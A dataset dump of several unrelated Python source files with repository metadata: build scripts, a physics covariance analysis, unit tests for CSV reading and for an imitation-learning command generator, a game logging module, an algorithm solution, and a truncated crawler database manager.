blob_id: string (length 40)
directory_id: string (length 40)
path: string (length 2-616)
content_id: string (length 40)
detected_licenses: list (length 0-69)
license_type: string (2 classes)
repo_name: string (length 5-118)
snapshot_id: string (length 40)
revision_id: string (length 40)
branch_name: string (length 4-63)
visit_date: timestamp[us]
revision_date: timestamp[us]
committer_date: timestamp[us]
github_id: int64 (2.91k-686M, nullable)
star_events_count: int64 (0-209k)
fork_events_count: int64 (0-110k)
gha_license_id: string (23 classes)
gha_event_created_at: timestamp[us]
gha_created_at: timestamp[us]
gha_language: string (220 classes)
src_encoding: string (30 classes)
language: string (1 class)
is_vendor: bool (2 classes)
is_generated: bool (2 classes)
length_bytes: int64 (2-10.3M)
extension: string (257 classes)
content: string (length 2-10.3M)
authors: list (length 1)
author_id: string (length 0-212)
---
9ac55e5dbd0041a00a974e7c8b20ab991e00d9c3
|
e40d5e30fb375589aa22efe2a4258f45cee99ce8
|
/src/common/SConscript
|
820fd7ffb580ec11c95fbc7d1ca8975217aaaac3
|
[] |
no_license
|
mironside/rabid
|
dfc0868a43b01fd4453981f50739af092e9889fe
|
70c7d4c27202b518a9412ae8a9a29ab6097c39c0
|
refs/heads/master
| 2016-09-10T11:23:09.351459 | 2013-04-23T16:15:55 | 2013-04-23T16:15:55 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 423 |
srcfiles = [
'console.cpp',
'leakTracer.cpp',
'log.cpp',
'profile.cpp',
'cbuf.cpp',
'commandSystem.cpp',
'cvarSystem.cpp',
'common.cpp',
'timer.cpp',
'keys.cpp',
'defMgr.cpp',
'def.cpp',
]
subdirs = ['fileSystem',
]
Import('env')
objs = []
if len(srcfiles) > 0:
objs += env.Object(srcfiles)
for dir in subdirs:
objs += env.SConscript(dir + '/SConscript')
Return('objs')
|
[
"chrisaolsen@gmail.com"
] |
chrisaolsen@gmail.com
|
|
91c805fdec4b684631cbcdd4b9d943daae660904
|
823d010b24a1f6b3800cbaa071f7b8126f43ffc1
|
/infer_D_through_autocorrelation_2D.py
|
6d721c07de252dc036451641e21e5a9f9cc312a0
|
[] |
no_license
|
Alexander-Serov/out-of-equilibrium-detection
|
fe31aae88022c7ba381b75642c545a19828913c6
|
40d0630af3709fbceb234edcdff2d24aab7ef6b9
|
refs/heads/master
| 2021-06-18T13:34:43.240628 | 2020-02-20T13:25:48 | 2020-02-20T13:25:48 | 156,554,754 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,989 |
py
|
# infer_D_through_autocorrelation_2D.py
# %%
try:
bl_has_run
except Exception:
%matplotlib
%load_ext autoreload
%autoreload 2
bl_has_run = True
import os
import pickle
import matplotlib.pyplot as plt
import numpy as np
from numpy import arctan, cos, pi, sin
from tqdm import tqdm
from hash_me import hash_me
from simulate_2d_confined import \
simulate_2_confined_particles_with_fixed_angle_bond
# # %% Constants
# dr = np.array([-0.9, 18])
# U = get_rotation_matrix(dr)
# U @ dr
# %% Constants
D1 = 5 # um^2/s; 0.4
D2 = 1 # um^2/s
k12 = 1e-6 # kg/s^2. Something interesting happens at 5e-7
T = 5e1 # s
gamma = 1e-8 # viscous drag, in kg/s
lags = range(10)
# D_ratios = [0.1, 0.5, 1.0, 5, 10]
def get_rotation_matrix(dr):
"""Return a rotation matrix that rotates the given vector to be aligned with the positive direction of x axis"""
tan_theta = - dr[1] / dr[0] if dr[0] != 0 else np.inf * (-dr[1])
if dr[0] >= 0:
theta = arctan(tan_theta)
else:
theta = arctan(tan_theta) + pi
# print(theta / pi)
# theta = 0
R = np.array([[cos(theta), - sin(theta)], [sin(theta), cos(theta)]])
return R
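# Quick sanity check (illustrative values, not from the original script):
# get_rotation_matrix(np.array([1.0, 1.0])) @ np.array([1.0, 1.0])
# -> approximately [1.41421356, 0.0], i.e. the vector is aligned with +x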
def locally_rotate_a_vector(dR, lag):
"""Create a vector, such that its component at position j+lag were defined by a rotation matrix for position j, which aligns the vector at position j with the axis x"""
N = dR.shape[1]
rotated = np.full_like(dR, np.nan)
for j in range(N - lag):
dr = dR[:, j]
RM = get_rotation_matrix(dr)
rotated[:, j] = RM @ dR[:, j + lag]
return rotated
# 4.86/2.36
# D1/D2
fig = plt.figure(num=2, clear=0)
fig.clear()
ax = fig.gca()
ax.plot([0, np.max(lags)], [0] * 2, 'k')
# for D_ratio in D_ratios:
# print(D_ratio)
# D1 = D2 * D_ratio
recalculate = 1
hash = hash_me('2D', D1, D2, k12, T, gamma)
filename = 'data/data_' + hash + '.pyc'
if os.path.exists(filename) and not recalculate:
with open(filename, 'rb') as file:
t, X, dX, Y, dY = pickle.load(file)
else:
t, X, dX, Y, dY = simulate_2_confined_particles_with_fixed_angle_bond(D1=D1, D2=D2, k12=k12, gamma=gamma,
T=T, plot=True, save=False)
with open(filename, 'wb') as file:
pickle.dump([t, X, dX, Y, dY], file, pickle.HIGHEST_PROTOCOL)
dt = t[1] - t[0]
# %
# Covariance of dX
particle = 2 # 1 or 2
variable = dX[particle - 1, :]
dR1 = np.array([dX[0, :], dY[0, :]])
dR2 = np.array([dX[1, :], dY[1, :]])
# variable = np.sum(dX, axis=0) / 2
# I will be looking at particle 2. Particle 1 will be the changing, invisible one
N = dR2.shape[1]
cov_parallel = np.zeros(len(lags)) * np.nan
mean_orthogonal = np.full_like(cov_parallel, np.nan)
var_orthogonal = np.full_like(cov_parallel, np.nan)
cov_orthogonal = np.full_like(cov_parallel, np.nan)
cov_y = np.full_like(cov_parallel, np.nan)
# For each dx I need to find the appropriate rotated lagged vector
for i, lag in enumerate(tqdm(lags, desc='Calculating covariances')):
# i = 0
# lag = 0
rot_0 = locally_rotate_a_vector(dR2, 0)
rot_lag = locally_rotate_a_vector(dR2, lag)
# Calculate the covariance between the x components of the new vectors
cov_parallel[i] = np.nanmean(rot_0[0, :] * rot_lag[0, :])
# Calculate the mean orthogonal component
mean_orthogonal[i] = np.nanmean(rot_lag[1, :])
# Calculate the variance of the orthogonal component
var_orthogonal[i] = np.nanvar(rot_lag[1, :])
cov_orthogonal[i] = np.nanmean(rot_0[0, :] * rot_lag[1, :])
cov_y[i] = np.nanmean(rot_0[1, :] * rot_lag[1, :])
# print(cov_x / D2 / dt)
# cov[i] = np.mean(variable[0:N - 1 - lag] * variable[lag:N - 1])
cov_parallel_norm = cov_parallel / (D2 * dt)
mean_orthogonal_norm = mean_orthogonal / np.sqrt(D2 * dt)
var_orthogonal_norm = var_orthogonal / (D2 * dt)
cov_orthogonal_norm = cov_orthogonal / (D2 * dt)
cov_y_norm = cov_y / (D2 * dt)
# cn1 = cov_norm
print(cov_parallel_norm)
print(mean_orthogonal_norm)
print(var_orthogonal_norm)
print(cov_orthogonal_norm)
# print(cn10 - cn1)
# Plot the covariances
# , label=f'$D_1/D_2 = $ {D_ratio:.2f}')
ax.plot(lags, cov_parallel_norm, '-o',
label='$\\overline{\\Delta x_n \\Delta x_{n+j}}$')
ax.plot(lags, mean_orthogonal_norm, '-o',
label='$\\overline{\\Delta y_{n+j}}$')
ax.plot(lags, var_orthogonal_norm, '-o',
label='$\\overline{(\\Delta y_{n+j})^2}$')
# ax.plot(lags, cov_orthogonal_norm, '-o',
# label='$\\overline{\\Delta x_n \\Delta y_{n+j}}$')
ax.plot(lags, cov_y_norm, '-o',
label='$\\overline{\\Delta y_n \\Delta y_{n+j}}$')
# plt.plot(lags, cn10-cn1, '-x')
plt.figure(num=2)
# plt.ylabel('$\\overline{\\Delta x_n \\Delta x_{n+j}}$')
plt.ylabel('Covariances')
plt.xlabel('Lag $j$')
plt.ylim([-1, 5.0])
plt.title(f'$D_2 = {D2:.2f}$')
plt.legend()
fig.show()
# %%
# figname = 'figs/covariance_dif_increase_other_D'
# fig.savefig(figname + '.pdf')
# fig.savefig(figname + '.png')
|
[
"asserov@gmail.com"
] |
asserov@gmail.com
|
f532f6eae4a880f02144914a4ecc060970c1f4bb
|
110b716c7234f931cbceda819e96f31f0ffb2615
|
/test_main.py
|
144df1573dd9157cbc3cc2c3cb2dbf607dc275ae
|
[] |
no_license
|
moktanaj/python-solution
|
17ae888e389b74df46493e38fbecbf87230e5fc6
|
ad8b4f8d271e6f201bf5a22d6baf96550163af50
|
refs/heads/main
| 2023-02-13T08:22:56.754853 | 2021-01-09T18:33:56 | 2021-01-09T18:33:56 | 328,187,024 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,543 |
py
|
import io
from main import *
from unittest import mock
@mock.patch("main.open_file")
def test_read_csv(mock_open_file):
f = io.StringIO("some initial text data")
mock_open_file.return_value = f
got_data = read_csv("does_not_exist.csv")
assert got_data == {}
def test_read_csv_with_file():
expected_dict = {'0': {'user_pseudo_id': '0', 'First': 'John', 'Last': 'Doe', 'Age': '55', 'Country': 'USA'}, '1': {'user_pseudo_id': '1', 'First': 'Ajay', 'Last': 'Moktan', 'Age': '35', 'Country': 'AUS'}}
got_data = read_csv("data/test_csv_correct.csv")
assert expected_dict == got_data
got_data = read_csv("data/test_csv.csv")
assert got_data == {}
@mock.patch("main.sys.exit")
def test_close_file_and_exit(mock_sys_exit):
# Testing happy path
close_file_and_exit(None, "example file")
mock_sys_exit.assert_called_with(1)
# Testing with incorrect file handler path
close_file_and_exit("incorrect file", "example file")
mock_sys_exit.assert_called_with(1)
def test_open_file_with_correct_file():
file_path = "data/test_csv.csv"
file = open_file(file_path, 'r')
assert file.name == file_path
@mock.patch("main.close_file_and_exit")
def test_open_file_with_incorrect_file(mock_close_file_and_exit):
file_path = "does_not_exist_test_file.csv"
error_message = "Error in file operation [Errno 2] No such file or directory: '{}'".format(file_path)
open_file(file_path, 'r')
mock_close_file_and_exit.assert_called_with(None, error_message)
|
[
"moktanaj@gmail.com"
] |
moktanaj@gmail.com
|
c6061d5f295fed6a46483bf27ca17b45bf838027
|
4c7ea6295a487ec18543e82f66e08a3a2a2fd124
|
/apps/logs/action/action_monster_level_reward.py
|
8a7e07ee77cf001a6d538be71ca87a390ab9e53c
|
[] |
no_license
|
robot-nan/GameLogServer
|
16217689d88ac5353a61881b03adb1b372cc3e16
|
ff2afd6d29e9dce6157a66ff62b4d1ea97d04184
|
refs/heads/master
| 2021-11-07T21:27:30.494271 | 2015-09-23T15:01:55 | 2015-09-23T15:01:55 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,292 |
py
|
# -*- coding:utf-8 -*-
"""
Pet level reward
"""
from apps.logs.action import action_base
from apps.utils import game_define
def log(user, gold, stone, equip_str, item_str):
"""
Output the log
"""
action = game_define.EVENT_ACTION_GET_MONSTER_LEVEL
cur_gold = user.player.get_gold()
cur_stone = user.player.get_stone()
log_lst = action_base.log_base(user)
log_lst.append(str(action))
log_lst.append(str(gold))
log_lst.append(str(cur_gold))
log_lst.append(str(stone))
log_lst.append(str(cur_stone))
log_lst.append(str(equip_str))
log_lst.append(str(item_str))
log_str = '$$'.join(log_lst)
return log_str
def parse(log_part_lst):
"""
Parse
"""
result = dict()
result['action'] = int(log_part_lst[0])
result['add_gold'] = int(log_part_lst[1])
result['cur_gold'] = int(log_part_lst[2])
result['add_stone'] = int(log_part_lst[3])
result['cur_stone'] = int(log_part_lst[4])
result['add_equip_list'] = action_base.get_val(log_part_lst, 5, [], True)
result['add_item_list'] = action_base.get_val(log_part_lst, 6, [], True)
result['old_gold'] = result['cur_gold'] - result['add_gold']
result['old_stone'] = result['cur_stone'] - result['add_stone']
return result
|
[
"a.robot.n@gmail.com"
] |
a.robot.n@gmail.com
|
96b3f469a19190afd2c4b5b108d36137e49ac8d2
|
055581f9d6c81eda2f73ea05b90b7a2256da1219
|
/parts/zodiac/zope/interface/common/tests/test_import_interfaces.py
|
876383faf7234e93c6a5f7995278350ec5f54606
|
[] |
no_license
|
Tosti770/zodiac
|
488a91c3e872a62d09a3ebb22a951dadcbd1c2df
|
af0380e20eb90699a84e3b7c6cb2085a1fb81667
|
refs/heads/master
| 2020-04-13T06:54:26.333228 | 2014-03-03T20:10:11 | 2014-03-03T20:10:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 121 |
py
|
/home/ruben/zodiac/eggs/zope.interface-4.0.5-py2.7-linux-x86_64.egg/zope/interface/common/tests/test_import_interfaces.py
|
[
"ruben_tc@hotmail.es"
] |
ruben_tc@hotmail.es
|
7ae1e204325dc9f0f443b7e2531a8b7ac35da9ae
|
38bc29ca0f7ec65d9b4f030d01aaafc8c82928e0
|
/minder/forms.py
|
c8c4b80005e5d2251412bca21ca591bd849e4b3d
|
[] |
no_license
|
nkarim496/MindStream
|
7164fea85517276513b9c083aa42b54cec60160f
|
48768de70255c927d1271437e4365467bf8894a8
|
refs/heads/master
| 2021-07-21T22:53:04.666624 | 2017-10-28T01:04:17 | 2017-10-28T01:04:17 | 108,609,580 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 170 |
py
|
from django.forms import ModelForm
from minder.models import Mind
class MindForm(ModelForm):
class Meta:
model = Mind
fields = ['mind', 'mind_img']
|
[
"nkarim496@gmail.com"
] |
nkarim496@gmail.com
|
3bc24697dee04be43497c122b3028c6926362734
|
b213fbd2f4f628aa0f2387c846673ac68e18aa91
|
/Binary_Search/600.py
|
4e544b47614dc36d42421f95f4fbc7fd3ea4e675
|
[
"MIT"
] |
permissive
|
wilbertgeng/LintCode_exercise
|
94309b4451e34f1931fce6c2ae90d0c2e7c41d35
|
e7a343b746e98ca3b4bc7b36655af7291f3150db
|
refs/heads/main
| 2023-05-13T06:06:50.887791 | 2021-05-26T20:33:51 | 2021-05-26T20:33:51 | 347,850,106 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,701 |
py
|
"""600. Smallest Rectangle Enclosing Black Pixels
"""
class Solution:
"""
@param image: a binary matrix with '0' and '1'
@param x: the location of one of the black pixels
@param y: the location of one of the black pixels
@return: an integer
"""
def minArea(self, image, x, y):
# write your code here
if not image or not image[0]:
return 0
m = len(image)
n = len(image[0])
left = self.findFirst(image, 0, y, self.checkColumn)
right = self.findLast(image, y, n - 1, self.checkColumn)
up = self.findFirst(image, 0, x, self.checkRow)
down = self.findLast(image, x, m - 1, self.checkRow)
return (right - left + 1) * (down - up + 1)
def findFirst(self, image, start, end, checkFunc):
while start + 1 < end:
mid = (start + end) // 2
if not checkFunc(image, mid):
start = mid
else:
end = mid
if checkFunc(image, start):
return start
return end
def findLast(self, image, start, end, checkFunc):
while start + 1 < end:
mid = (start + end) // 2
if not checkFunc(image, mid):
end = mid
else:
start = mid
if checkFunc(image, end):
return end
return start
def checkRow(self, image, row):
for i in range(len(image[0])):
if image[row][i] == "1":
return True
return False
def checkColumn(self, image, col):
for i in range(len(image)):
if image[i][col] == "1":
return True
return False
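# Illustrative usage (assumed test case, not part of the original file):
# image = ["0010", "0110", "0100"]
# Solution().minArea(image, 0, 2) # -> 6 (3 rows x 2 columns)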
|
[
"wilbertgeng@gmail.com"
] |
wilbertgeng@gmail.com
|
3fffc2ba463ecceee2069ca4cf30b9a15adf8ed4
|
d7c80095dce650af870ffd406ab2b2083299c603
|
/3.1 Population Dynamics/module2.py
|
aa4f5203d4e125cf00c2618ae10ef63642c9228e
|
[] |
no_license
|
vpjuguilon/AppPhysics156
|
c46e8ac655943f0f94842e45244d84524a02cfff
|
69ed54db4fc2cac52824ba774ea78b108343c3a0
|
refs/heads/master
| 2020-04-04T01:55:39.041134 | 2019-06-23T02:43:31 | 2019-06-23T02:43:31 | 155,682,155 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 608 |
py
|
from matplotlib.pyplot import plot, show, scatter, hist, xlabel, ylabel
from numpy import linspace
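# f below is the logistic map 4*r*x*(1 - x); iterating it and plotting the
# (x, f(x)) trajectory against the line y = x produces a cobweb diagram.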
def f(x, r):
return 4*r*x*(1-x)
R = 0.9642
xvals = linspace(0, 1, 1000)
ypara = f(xvals, R)
plot(xvals, xvals, 'k-')
plot(xvals, ypara, 'k-')
Xhistogram = [0.65]
for j in range(1000):
Xhistogram.append(f(Xhistogram[j], R))
Xhistogram = Xhistogram[99:949]
Ypop = []
Xpop = []
for k in Xhistogram:
Xpop.append(k)
Ypop.append(f(k, R))
Xpop.append(f(k, R))
Ypop.append(f(k, R))
plot(Xpop, Ypop, 'k.-', linewidth = 0.1)
xlabel('x')
ylabel('f(x)')
show()
|
[
"noreply@github.com"
] |
vpjuguilon.noreply@github.com
|
be4ca29e261b08db9e72e699d5ce956447bcecb4
|
828282d212d33667f05818d144ce1534db0d1584
|
/tests/test_experiments.py
|
0f6d314fe61773b25392c907c5c50f5368f0d952
|
[
"MIT"
] |
permissive
|
HumanCompatibleAI/imitation
|
bdbb167d8e1abc0fb629d18ac88121a096881d43
|
5b0b531bdf6fdfcaab93ff18f454aa1b54bb4355
|
refs/heads/master
| 2023-08-17T08:29:01.192792 | 2023-08-11T07:57:29 | 2023-08-11T07:57:29 | 160,906,482 | 936 | 203 |
MIT
| 2023-09-14T12:04:40 | 2018-12-08T05:15:33 |
Python
|
UTF-8
|
Python
| false | false | 12,459 |
py
|
"""Tests for commands.py + Smoke tests for bash scripts in experiments/."""
import glob
import os
import pathlib
import subprocess
from typing import List
import pytest
SCRIPT_NAMES = (
"bc_benchmark.sh",
"dagger_benchmark.sh",
"benchmark_and_table.sh",
"imit_benchmark.sh",
"rollouts_from_policies.sh",
"transfer_learn_benchmark.sh",
)
THIS_DIR = pathlib.Path(__file__).absolute().parent
BENCHMARKING_DIR = THIS_DIR.parent / "benchmarking"
EXPERIMENTS_DIR = THIS_DIR.parent / "experiments"
COMMANDS_PY_PATH = EXPERIMENTS_DIR / "commands.py"
EXPECTED_LOCAL_CONFIG_TEMPLATE = """python -m imitation.scripts.train_imitation dagger \
--capture=sys --name=run0 --file_storage={output_dir}/sacred/\
$USER-cmd-run0-dagger-0-8bf911a8 \
with benchmarking/fast_dagger_seals_cartpole.json \
seed=0 logging.log_root={output_dir}"""
EXPECTED_HOFVARPNIR_CONFIG_TEMPLATE = """ctl job run \
--name $USER-cmd-run0-dagger-0-c3ac179d \
--command "python -m imitation.scripts.train_imitation dagger \
--capture=sys --name=run0 --file_storage={output_dir}/sacred/\
$USER-cmd-run0-dagger-0-c3ac179d \
with /data/imitation/benchmarking/fast_dagger_seals_cartpole.json \
seed=0 logging.log_root={output_dir}" \
--container hacobe/devbox:imitation \
--login --force-pull --never-restart --gpu 0 \
--shared-host-dir-mount /data"""
def _get_benchmarking_path(benchmarking_file):
return os.path.join(BENCHMARKING_DIR.stem, benchmarking_file)
def _run_commands_from_flags(**kwargs) -> List[str]:
"""Run commands.py with flags derived from the given `kwargs`.
This is a helper function to reduce boilerplate code in the tests
for commands.py.
Each key-value pair in kwargs corresponds to one flag.
If the value in the key-value is True, then the flag has the form "--key".
If the value in the key-value is a list, then the flag has the form
"--key value[0] value[1] ..."
Otherwise, the flag has the form "--key=value".
E.g., _run_commands_from_flags(name="baz", seeds=[0, 1], remote=True)
will execute the following python command:
python experiments/commands.py --name=baz --seeds 0 1 --remote
The function will return the parsed output of executing that command.
Args:
kwargs: keyword arguments from which to derive flags.
Returns:
A list where the ith entry of the list is the ith line printed out
by the python command.
"""
flags = []
# Add some defaults so that most tests can skip specifying these flags.
if "name" not in kwargs:
flags.append("--name=run0")
if "cfg_pattern" not in kwargs:
cfg_pattern = _get_benchmarking_path("fast_dagger_seals_cartpole.json")
flags.append("--cfg_pattern=" + cfg_pattern)
if "output_dir" not in kwargs:
flags.append("--output_dir=output")
# Build the flags.
for key in kwargs:
if isinstance(kwargs[key], bool) and kwargs[key]:
flag = f"--{key}"
elif isinstance(kwargs[key], list):
value = " ".join(map(str, kwargs[key]))
flag = f"--{key} {value}"
else:
flag = f"--{key}={kwargs[key]}"
flags.append(flag)
py_command = f"python {COMMANDS_PY_PATH} " + " ".join(flags)
completed_process = subprocess.run(
py_command,
shell=True,
capture_output=True,
stdin=subprocess.DEVNULL,
check=True,
)
# Each line of the formatted stdout is a command.
formatted_stdout = completed_process.stdout.decode("ascii").strip()
commands = formatted_stdout.split("\n")
return commands
def test_commands_local_config():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
commands = _run_commands_from_flags()
assert len(commands) == 1
expected = EXPECTED_LOCAL_CONFIG_TEMPLATE.format(output_dir="output")
assert commands[0] == expected
def test_commands_local_config_runs(tmpdir):
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
commands = _run_commands_from_flags(output_dir=tmpdir)
assert len(commands) == 1
expected = EXPECTED_LOCAL_CONFIG_TEMPLATE.format(output_dir=tmpdir)
assert commands[0] == expected
completed_process = subprocess.run(
commands[0],
shell=True,
capture_output=True,
stdin=subprocess.DEVNULL,
check=True,
)
assert completed_process.returncode == 0
assert (tmpdir / "dagger" / "seals-CartPole-v0").exists()
assert (tmpdir / "sacred").exists()
def test_commands_local_config_with_custom_flags():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
commands = _run_commands_from_flags(
name="baz",
seeds=1,
output_dir="/foo/bar",
)
assert len(commands) == 1
expected = """python -m imitation.scripts.train_imitation dagger \
--capture=sys --name=baz --file_storage=/foo/bar/sacred/\
$USER-cmd-baz-dagger-1-8bf911a8 \
with benchmarking/fast_dagger_seals_cartpole.json \
seed=1 logging.log_root=/foo/bar"""
assert commands[0] == expected
def test_commands_hofvarpnir_config():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
output_dir = "/data/output"
commands = _run_commands_from_flags(output_dir=output_dir, remote=True)
assert len(commands) == 1
expected = EXPECTED_HOFVARPNIR_CONFIG_TEMPLATE.format(output_dir=output_dir)
assert commands[0] == expected
def test_commands_hofvarpnir_config_with_custom_flags():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
commands = _run_commands_from_flags(
name="baz",
remote_cfg_dir="/bas/bat",
seeds=1,
output_dir="/foo/bar",
container="bam",
remote=True,
)
assert len(commands) == 1
expected = """ctl job run --name $USER-cmd-baz-dagger-1-345d0f8a \
--command "python -m imitation.scripts.train_imitation dagger \
--capture=sys --name=baz --file_storage=/foo/bar/sacred/\
$USER-cmd-baz-dagger-1-345d0f8a \
with /bas/bat/fast_dagger_seals_cartpole.json \
seed=1 logging.log_root=/foo/bar" --container bam \
--login --force-pull --never-restart --gpu 0 \
--shared-host-dir-mount /data"""
assert commands[0] == expected
def test_commands_local_config_with_special_characters_in_flags(tmpdir):
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
# Simulate running commands.py with the following flag:
# --output_dir="\"/tmp/.../foo bar\""
# And generating a training command with the following flag:
# --logging.log_root="/tmp/.../foo bar"
#
# If we didn't enclose the directory in quotes as in:
# --output_dir=/tmp/.../foo bar
# Then we would get an "unrecognized arguments: bar" error
# trying to run commands.py.
#
# Or if we enclosed the directory in double quotes as in:
# --output_dir="/tmp/.../foo bar"
# Then we would generate a training command with the following flag:
# --logging.log_root=/tmp/.../foo bar
# And we would get an error trying to run the generated command.
output_subdir = "foo bar"
unquoted_output_dir = (tmpdir / f"{output_subdir}").strpath
output_dir = '"\\"' + unquoted_output_dir + '\\""'
commands = _run_commands_from_flags(output_dir=output_dir)
assert len(commands) == 1
# The extra double quotes are removed in the generated command.
# It has the following flag:
# --logging.log_root="/tmp/.../foo bar"
# So it can run without an error introduced by the space.
expected = EXPECTED_LOCAL_CONFIG_TEMPLATE.format(
output_dir='"' + unquoted_output_dir + '"',
)
assert commands[0] == expected
def test_commands_hofvarpnir_config_with_special_characters_in_flags(tmpdir):
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
# See the comments in
# test_commands_local_config_with_special_characters_in_flags
# for a discussion of special characters in the flag values.
output_subdir = "foo bar"
unquoted_output_dir = (tmpdir / f"{output_subdir}").strpath
output_dir = '"\\"' + unquoted_output_dir + '\\""'
commands = _run_commands_from_flags(output_dir=output_dir, remote=True)
assert len(commands) == 1
# Make sure double quotes are escaped in the training script command
# because the training script command is itself enclosed in double
# quotes within the cluster command.
expected = EXPECTED_HOFVARPNIR_CONFIG_TEMPLATE.format(
output_dir='\\"' + unquoted_output_dir + '\\"',
)
assert commands[0] == expected
def test_commands_bc_config():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
cfg_pattern = _get_benchmarking_path("example_bc_seals_ant_best_hp_eval.json")
commands = _run_commands_from_flags(cfg_pattern=cfg_pattern)
assert len(commands) == 1
expected = """python -m imitation.scripts.train_imitation bc \
--capture=sys --name=run0 --file_storage=output/sacred/\
$USER-cmd-run0-bc-0-138a1475 \
with benchmarking/example_bc_seals_ant_best_hp_eval.json \
seed=0 logging.log_root=output"""
assert commands[0] == expected
def test_commands_dagger_config():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
cfg_pattern = _get_benchmarking_path("example_dagger_seals_ant_best_hp_eval.json")
commands = _run_commands_from_flags(cfg_pattern=cfg_pattern)
assert len(commands) == 1
expected = """python -m imitation.scripts.train_imitation dagger \
--capture=sys --name=run0 --file_storage=output/sacred/\
$USER-cmd-run0-dagger-0-6a49161a \
with benchmarking/example_dagger_seals_ant_best_hp_eval.json \
seed=0 logging.log_root=output"""
assert commands[0] == expected
def test_commands_gail_config():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
cfg_pattern = _get_benchmarking_path("example_gail_seals_ant_best_hp_eval.json")
commands = _run_commands_from_flags(cfg_pattern=cfg_pattern)
assert len(commands) == 1
expected = """python -m imitation.scripts.train_adversarial gail \
--capture=sys --name=run0 --file_storage=output/sacred/\
$USER-cmd-run0-gail-0-3ec8154d \
with benchmarking/example_gail_seals_ant_best_hp_eval.json \
seed=0 logging.log_root=output"""
assert commands[0] == expected
def test_commands_airl_config():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
cfg_pattern = _get_benchmarking_path("example_airl_seals_ant_best_hp_eval.json")
commands = _run_commands_from_flags(cfg_pattern=cfg_pattern)
assert len(commands) == 1
expected = """python -m imitation.scripts.train_adversarial airl \
--capture=sys --name=run0 \
--file_storage=output/sacred/$USER-cmd-run0-airl-0-400e1558 \
with benchmarking/example_airl_seals_ant_best_hp_eval.json \
seed=0 logging.log_root=output"""
assert commands[0] == expected
def test_commands_multiple_configs():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
# Test a more complicated `cfg_pattern`.
cfg_pattern = _get_benchmarking_path("*.json")
commands = _run_commands_from_flags(cfg_pattern=cfg_pattern)
assert len(commands) == len(glob.glob(cfg_pattern))
def test_commands_multiple_configs_multiple_seeds():
if os.name == "nt": # pragma: no cover
pytest.skip("commands.py not ported to Windows.")
cfg_pattern = _get_benchmarking_path("*.json")
seeds = [0, 1, 2]
commands = _run_commands_from_flags(
cfg_pattern=cfg_pattern,
seeds=seeds,
)
n_configs = len(glob.glob(cfg_pattern))
n_seeds = len(seeds)
assert len(commands) == (n_configs * n_seeds)
@pytest.mark.parametrize(
"script_name",
SCRIPT_NAMES,
)
def test_experiments_fast(script_name: str):
"""Quickly check that experiments run successfully on fast mode."""
if os.name == "nt": # pragma: no cover
pytest.skip("bash shell scripts not ported to Windows.")
exit_code = subprocess.call([f"./{EXPERIMENTS_DIR.stem}/{script_name}", "--fast"])
assert exit_code == 0
|
[
"noreply@github.com"
] |
HumanCompatibleAI.noreply@github.com
|
a1d78a24879670100945b229da0affe9517608fe
|
c04a7a9627e2914c92d48d473ada6214e9044d9b
|
/music_spider/common/DbManager.py
|
d2f4f7289ff12e8ab9a1e32b5ff778e9af2a161b
|
[] |
no_license
|
xsren/uplooking_spider
|
b00194399f927a21cb395698fadd076413e39754
|
e4d9cfed8c9f28458df5806d583109e58b9391d6
|
refs/heads/master
| 2020-03-24T11:20:20.500996 | 2018-08-18T09:12:37 | 2018-08-18T09:12:37 | 142,682,770 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,791 |
py
|
# coding:utf8
import sys
import time
import traceback
from queue import Queue
from pymongo import UpdateOne, ReplaceOne, InsertOne, UpdateMany
from pymongo.errors import BulkWriteError
from twisted.internet import reactor, defer
# Local modules
sys.path.append('../main')
import settings
import common
class DbManager:
def __init__(self, logger, mc, write_queues, task_queues, count_queue):
self.logger = logger
self.mc = mc
self.write_queues = write_queues
self.task_queues = task_queues
self.count_queue = count_queue
def init_write_queue(self, dbName, collName):
if self.write_queues.get(dbName, None) == None:
self.write_queues[dbName] = {}
self.write_queues[dbName][collName] = Queue(maxsize=settings.write_queue_size)
else:
if self.write_queues[dbName].get(collName, None) == None:
self.write_queues[dbName][collName] = Queue(maxsize=settings.write_queue_size)
def init_task_queue(self, dbName, collName):
if self.task_queues.get(dbName, None) == None:
self.task_queues[dbName] = {}
self.task_queues[dbName][collName] = Queue(maxsize=settings.write_queue_size)
else:
if self.task_queues[dbName].get(collName, None) == None:
self.task_queues[dbName][collName] = Queue(maxsize=settings.write_queue_size)
'''
Common handling code shared by typical sites
'''
def cleanup_handle_queue(self):
self.logger.info("clear ... cleanup begin")
try:
reactor.callInThread(self._handle_write_queue, 1)
# self._handle_write_queue(limit=1)
self._handle_count_queue(limit=1)
except BulkWriteError as bwe:
self.logger.error(bwe.details)
# you can also take this component and do more analysis
werrors = bwe.details['writeErrors']
self.logger.error(werrors)
except Exception as e:
self.logger.error(str(e))
traceback.print_exc()
self.logger.info("clear ... cleanup end")
def _handle_write_queue(self, limit):
for dbName, v in self.write_queues.items():
for collName, _queue in v.items():
if _queue.qsize() >= limit:
t0 = time.time()
requests, dups = [], []
qsize = _queue.qsize()
while _queue.qsize() > 0:
try:
tup = _queue.get_nowait()
_queue.task_done()
except Exception as e:
self.logger.error(str(e))
break
